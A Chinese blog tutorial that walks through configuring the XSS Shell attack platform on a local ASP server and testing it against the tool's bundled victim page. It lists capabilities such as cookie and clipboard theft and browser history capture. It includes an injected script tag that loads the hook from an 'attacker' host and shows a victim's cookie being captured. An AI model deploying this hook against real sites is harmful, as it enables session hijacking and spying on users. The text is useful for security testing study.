利用XSS Shell进行XSS测试

最新推荐文章于 2024-04-23 10:04:40 发布
最新推荐文章于 2024-04-23 10:04:40 发布
阅读量877 收藏
点赞数
分类专栏: Security 文章标签: shell 测试 credentials asp mozilla 浏览器
 
0x01 XSS Shell简介

 

XSS Shell一个windows环境下的XSS攻击平台。下载地址为:http://www.portcullis-security.com/tools/free/XSSShell039.zip

利用XSS Shell,攻击者可以轻松攻击存在XSS漏洞的网站的用户。目前可以实施的攻击包括但不限于:

1、获取用户cookie;

2、获取用户当前页面内容;

3、弹出窗口;

4、执行JS代码;

5、弹出与用户交互窗口;

6、获取键盘日志(测试中未成功);

7、获取鼠标日志(测试中未成功);

8、获取剪贴板(仅限IE);

9、获取内部IP(仅支持Mozilla* + JVM

10、获取用户浏览历史;

11、Make a request with victim credentials (目前不了解)

12、DDoS;

13、耗尽用户计算机CPU资源。

// 注:XSS,即Cross-Site Script,跨站脚本攻击。

0x02 ASP测试环境快速搭建

要使用XSS Shell ,需要搭建asp web服务器的,以监听请求。为了简便起见,测试中使用Aws2.2(AspWebServer)快速搭建asp环境。

Aws的最新版为3.0版本。官方网站为:http://www.hicoder.com/

Aws搭建asp环境非常简单,将其拷贝到测试站点根目录后运行即可。

0x03 XSS Shell的配置
创建XSS Shell管理端

1. 将"xssshell" 文件夹拷贝到Aws所在目录$path。

2. 将"db"文件夹拷贝到"xssshell"下更隐蔽的目录$hpath下;

3. 修改"xssshell/db.asp"中Const DBPATH 的值为$hpath\shell.mdb。默认情况下为:

wps_clip_image-19145

4. 修改"xssshell/db.asp"的默认管理密码。初始密码: w00t:

wps_clip_image-24035

5. 访问http://127.0.0.1/xssshell/,输入管理密码,点击login,可以看到如下界面:

wps_clip_image-28984

上图中,最左侧为功能区域,中间部分为在线目标列表区域,最右侧为日志记录区域。可以看到目前没有目标在线。因此,下面需要配置XSS Shell。

配置XSS Shell

1. 打开"xssshell.asp".

2. 将"SERVER"设为xssshell所在目录。本次测试中为: "http://127.0.0.1/";

3. 核对 "ME", "CONNECTOR", "COMMANDS_URL" 的值。

wps_clip_image-24894

测试中可以将server的值替换为之前的设置项(http://127.0.0.1),在浏览器中打开完整的完整的URL,如果页面显示正常,表明配置正确。

0x04 测试sample_victim

以XSS Shell自带的sample_victim为例,我们进行测试,测试之前还需要修改sample_victim/default.asp中的测试跨站语句:

<script src="http://attacker:81/xssshell.asp?v=336699"></script>

修改为:

<script src="http://127.0.0.1/xssshell.asp?v=336699"></script>

修改完成后,在其他浏览器窗口中打开:http://127.0.0.1/sample_victim/

wps_clip_image-9033

此时可以看到XSS Shell管理页面可以看到有一台目标用户上线:(127.0.0.1/158534

wps_clip_image-13891

此时点击最左侧的功能项,以获取cookie为例:

wps_clip_image-954

可以看到在最右侧的显示区域,成功获取了目标用户的cookie。

同理,我们可以执行其他的功能,比如最简单的弹窗测试。

在页面左下角的Parameters :  区域,输入测试语句"XSS by Phoenix!",点击"alert(<message>) ",可以看到目标用户的浏览器弹出相应窗口:

wps_clip_image-4881

更多的利用案例将在后续补充。

meander
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
discuz xssshell
Coisini的博客
05-26 1410
Discuz XSS得webshell By racle @tian6.com 欢迎转帖.但请保留版权信息. 受影响版本:Discuz<=6.1.0,gbk+utf+big5 新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效. ...
渗透学习-靶场篇-XSS之订单与shell箱子反杀
qq_43696276的博客
09-19 2358
这里,我们将综合的利用一下xss平台去进行对之前的某些站点进行攻击。本次将主要利用的是军锋真人cs野战的订单平台进行实验。除此之外,我们还将进行shell箱子的反杀过程!!
记一次XSS至getshell全过程!
hot_milk1的博客
02-27 706
偶然在一次渗透过程中发现一个客服系统聊天界面发现可以XSS对发送信息处进行抓包,可在content参数插入xss语句这是访客前台效果:这是后台管理的效果:而且只要客服查看信息,便可以执行XSS语句然并卵,本来想钓客服的cookie,登录后台,找到shell点,成功getshell(幻想时间),但是经过测试,发现该客服系统的session是受保护的,并不能窃取到cookie已经决定放弃这个点了,随后在审计源码后,发现了图片上传点老样子,抓包改后缀解码得知,不支持php的文件格式。
跨站平台XSS SHELL使用方法
weixin_33968104的博客
03-24 327
理解xss shell是什么之前,让我们一起回顾一下一些基本的xss(跨站脚本),xss是最常见的一个漏洞,存在于今天许多的web应用程序。xss是***者试图通过web应用程序执行恶意脚本的技术,***者通过突破同源策略的web应用程序。***者一旦能够找到一个存在xss漏洞的web应用程序,他可以利用这个漏洞只想不同类型的***其中一些是: 窃取凭据(Stealing C...
XSS漏洞-04】如何调用XSS漏洞的shellcode
m0_64378913的博客
05-15 1442
目录1 实验简介1.1 实验目的1.2 实验环境2 shellcode的调用实验2.1 远程调用JS2.2 利用Windows.location.hash触发JS2.3 利用XSS下载器2.4 备选存储技术 在上两节中我们了解了XSS漏洞验证、语句构造与绕过的方法,而完整的XSS攻击会将shellcode(shellcode就是利用漏洞所执行的代码)存放在一个地方,然后在存在XSS漏洞的地方触发漏洞去调用代码。 1 实验简介 1.1 实验目的 模拟利用XSS漏洞执行shellcode的几种方法。 1.2 实
xssshell2.0
08-02
xssshell 2.0 非常好用xss跨站工具. author:darkwahaha
xssshell-rqndx
11-30
xsshell,自己整理的,clear.php备份当前cook.html后清空内容,admin.php是个shell,方便管理XSS.txt常用命令
xssshell工具一份
09-28
xssshell工具一份,慎用,研究即可。
第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记1
08-03
WEB 漏洞-XSS 跨站之订单及 Shell 箱子反杀#XSS 平台及工具使用#XSS 经典应用案例测试#Session 与 Cookie 获取问题docum
QuickXSS:使用Bash自动化XSS
05-05
QuickXSS 使用Waybackurls,GF,GF模式和Dalfox自动执行XSS的Bash脚本。 这是他们的存储库:先决条件在计算机中安装Go,然后安装所需的工具。 要在系统中安装Go,请执行以下操作: sudo apt install -y golangexport...
Go-XSShell是一个XSS反向shell框架
08-14
XSShell是一个跨站点脚本的反向shell ...好吧,也许它不是一个真正的反向shell,但它允许你与XSS受害者的浏览器实时交互。
xss.js.zip
07-29
xss是一个用于对用户输入的内容进行过滤,以避免遭受 XSS 攻击的模块,可通过白名单来控制允许的标签及相关的标签属性,另外还提供了一系列的接口以便用户扩展。
第26天-WEB漏洞-XSS跨站之订单及Shell箱子反杀记
MCTSOG的博客
03-11 1374
思维导图 xss漏洞存在的地方 留言板 评论区 订单系统 意见反馈等 #cookie session 用户凭据:通过凭据可以判断对方身份信息 cookie 存储本地 存活时间较长 小中型 session 会话 存储服务器 存活时间较短 大型 演示案例: 某营销订单系统 XSS 盲打_平台 前端订单界面 后端管理界面 演示这个案例的意图是:了解在什么位置利用xss,从而获取有用信息! 使用xss平台/工具 自己编写代码接收 某 Shell 箱子系统 XSS 盲打_工具 跨站漏
XSS 跨站脚本攻击之ShellCode的调用
a18946983682的博客
08-08 336
1.ShellCode,最初是溢出程序和蠕虫病毒的核心,实际上是指利用一个漏洞是所执行的代码,在XSS跨站脚本中,是指由javascript等脚本编写的XSS利用代码; 2.Exploit,在黑客眼里就是漏洞利用,通常表示完整编写好的漏洞利用工具(或程序),具有一定的攻击性;Exploit往往包含了shellcode 3.POC:即Proof of Concept,是一段...
网络安全之反弹Shell
小飞的博客
04-12 1506
在网络安全和渗透测试领域,“正向Shell”(Forward Shell)和"反向Shell"(Reverse Shell)是两种常用的技术手段,用于建立远程访问目标计算机的会话。这两种技术都可以让攻击者在成功渗透目标系统后执行命令,但它们在建立连接的方式上有所不同。
VulnHub靶机 DC-7 打靶 渗透详细流程
rumil的博客
04-22 708
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
一次OSS Accesskey泄露记录
最新发布
weixin_59047731的博客
04-23 316
渗透千万条,安全第一条。操作不规范,亲人两行泪。
测试工程师 常用shell脚本
05-17
以下是一些测试工程师常用的 shell 脚本: 1. 自动化测试脚本:用于执行自动化测试,如 UI 测试、接口测试等。 2. 日志分析脚本:用于分析测试日志,查找错误和问题。 3. 数据生成脚本:用于生成测试数据,如随机数、随机字符串等。 4. 环境部署脚本:用于部署测试环境,如数据库、服务器等。 5. 性能测试脚本:用于执行性能测试,如压力测试、负载测试等。 6. 自动化部署脚本:用于自动化部署测试代码和配置文件。 7. 数据库备份脚本:用于备份数据库,保证数据的安全性。 8. 应用程序监控脚本:用于监控应用程序的运行状态,如 CPU 占用率、内存占用率等。 9. 安全测试脚本:用于执行安全测试,如 SQL 注入、XSS 攻击等。 10. 自动化测试报告脚本:用于生成测试报告,展示测试结果和测试覆盖率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值